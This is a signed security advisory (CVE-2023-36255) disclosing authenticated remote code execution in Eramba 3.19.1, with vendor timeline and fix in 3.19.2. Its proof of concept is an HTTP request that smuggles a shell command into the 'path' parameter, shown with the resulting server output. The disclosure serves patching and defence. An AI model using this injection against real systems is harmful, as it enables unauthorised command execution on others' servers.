-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

# Trovent Security Advisory 2303-01 #
#####################################


Authenticated remote code execution in Eramba
#############################################


Overview
########

Advisory ID: TRSA-2303-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2303-01
Affected product: Eramba
Affected version: 3.19.1 (Enterprise and Community edition)
Vendor: Eramba Limited, https://www.eramba.org
Credits: Trovent Security GmbH, Sergey Makarov


Detailed description
####################

Eramba is a web application for managing Governance, Risk, and Compliance (GRC).
Trovent Security GmbH discovered that the Eramba web application allows remote
code execution for authenticated users.
A possible attacker is able to modify the parameter "path" in the URL
"https://hostname/settings/download-test-pdf?path=" to execute arbitrary
commands in the context of the user account the application is running in.
To see the output of the executed command in the HTTP response, debug mode has
to be enabled.

Severity: High
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVE ID: CVE-2023-36255
CWE ID: CWE-94


Proof of concept
################

HTTP request:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: [redacted]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP response:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: *
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>
        Error: The exit status code &#039;127&#039; says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether [redacted] brd ff:ff:ff:ff:ff:ff
    inet [redacted] brd [redacted] scope global ens33
       valid_lft forever preferred_lft forever
    inet6 [redacted] scope link
       valid_lft forever preferred_lft forever
&quot;
command: ip a; --dpi &#039;90&#039; --lowquality --margin-bottom &#039;0&#039; --margin-left &#039;0&#039;
 --margin-right &#039;0&#039; --margin-top &#039;0&#039; --orientation &#039;Landscape&#039;
 --javascript-delay &#039;1000&#039; &#039;/tmp/knp_snappy6426d4231040e1.91046751.html&#039;
&#039;/tmp/knp_snappy6426d423104587.46971034.pdf&#039;.    </title>

[...]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

The vendor released a fixed version of Eramba.

Fixed in version 3.19.2.


History
#######

2023-03-31: Vulnerability found
2023-04-04: Vendor contacted
2023-04-17: Vendor confirmed vulnerability
2023-04-20: Vendor released fixed version
2023-05-25: Trovent verified remediation of the vulnerability
2023-06-13: CVE ID requested
2023-07-28: CVE ID received
2023-08-01: Advisory published
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE0wArIZvu5AKY9ZSXzx6v/h6FjrcFAmTJJHcACgkQzx6v/h6F
jrfgig/9F6YhluWjLmDBodMSpWExFylk/MqlYOXGArewXl/OO91V1e4rt82eyg7E
bySLgWFAbrOtQ0geoRhgKCI0h9DelT+KAE6fxIW/p5eUEXRS5ng5eZ1eDonpeuHx
IRAs+oQgneUxPHSJJ65xEadB98po7Ts3tnKK31F+jbCDxNIjyXDAoTrx1JgMWQG6
tKOm1R7jj6BGy8eIyvoxL4yPIz2LBXgrYT2nLlDlSvCG9nDqIfyicF8adPe4w8Y2
IVe6t9VsqaxXDFqrpewkmvtY8XR8wES38l5SsPWYxL9atooFuvM0C3gG29dVWaQF
jA/X47fa/R+NKli6Cw+XnvdgWrhT019hINTgyUR/9NSNGivCox3UG71PFgmf4wlL
JQwymUTdcQU6hLkXV8pPnUaOvRwfoNIy4iiIb8p5/3X7Y8hI7HtUZ7dszMKpE7mC
HgHPTTnWnWZoriOavlPl5vypQV8hXbwFvaGzRAp8r7cW78e3tX6Cr7WJmEH+k6ht
Y6jsj8jkR1XMgeW5BY5DptmreocwwzHNQ2jhQMiH2cznWj78ygRmACOm+X9mhr5I
14lExR7eZTKeh98InQhch3eDAgjN0OjNR6dtcGP3KBJ66s132BUYKhOHX8Ne5Xr4
PAmVzpKpJvrZPXjsrO0NCuOT0Kpd28thhSGUOERM+bYD0TMuHTA=
=zobn
-----END PGP SIGNATURE-----